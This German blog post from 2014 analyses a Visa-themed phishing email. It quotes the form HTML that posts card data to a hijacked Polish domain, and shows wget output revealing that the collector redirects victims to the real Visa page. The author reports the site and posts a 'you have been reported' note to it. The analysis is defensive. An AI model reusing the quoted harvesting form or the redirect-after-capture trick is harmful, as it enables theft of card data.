Phishing-Angriff - Trickreicher Webserver

Und noch ein Beitrag, weils so spannend ist:

Die üblichen Phishing-Mails kennt ja jeder.

Visa-Kreditkartendaten in Formular eingeben, abschicken und wer anders freut sich:

In meinem Fall ist im HTML-Code der Verweis auf:

<form name=“frm“ action=“http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php“ method=“post“ onsubmit=“return valFrm()“><table id=“formTable“><tr><td colspan=“2″><span id=“title“>Reactivate the Verified by Visa/Mastercard service.</span>

Auch hier wieder gekaperte Domain von polnischer Firma übernommen. Das spannende hier ist jedoch, dass der Server egal ob mit get/post nachdem wir die Daten abgeliefert haben, einen redirect auf die offizielle Visa-Seite liefert. So sieht das ganze auf den ersten Blick täuschend echt aus…

stefan@wrk1:~$ wget http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
–2014-04-12 11:50:28– http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
Resolving fabrykaperspektyw.pl (fabrykaperspektyw.pl)… 77.55.2.176
Connecting to fabrykaperspektyw.pl (fabrykaperspektyw.pl)|77.55.2.176|:80… connected.
HTTP request sent, awaiting response… 302 Found
Location: http://usa.visa.com/personal/cards/index.html [following]
–2014-04-12 11:50:28– http://usa.visa.com/personal/cards/index.html
Resolving usa.visa.com (usa.visa.com)… 92.122.25.100
Connecting to usa.visa.com (usa.visa.com)|92.122.25.100|:80… connected.

Nachdem wir auch hier den Hoster informiert haben, hinterlassen wir noch eine Info in deren Logs:

stefan@wrk1:~$ wget -d –post-data ‚you=have_been_reported‘ http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
Setting –post-data (postdata) to you=have_been_reported
DEBUG output created by Wget 1.13.4 on linux-gnu.

URI encoding = `UTF-8′
–2014-04-12 12:07:07– http://fabrykaperspektyw.pl/modules/mod_zetta/auth.php
Resolving fabrykaperspektyw.pl (fabrykaperspektyw.pl)… 77.55.2.176
Caching fabrykaperspektyw.pl => 77.55.2.176
Connecting to fabrykaperspektyw.pl (fabrykaperspektyw.pl)|77.55.2.176|:80… connected.
Created socket 3.
Releasing 0x00000000009aed70 (new refcount 1).

—request begin—
POST /modules/mod_zetta/auth.php HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: fabrykaperspektyw.pl
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

—request end—
[POST data: you=have_been_reported]

Phishing-Angriff – Trickreicher Webserver

Published by cubewerk on 12. April 201412. April 2014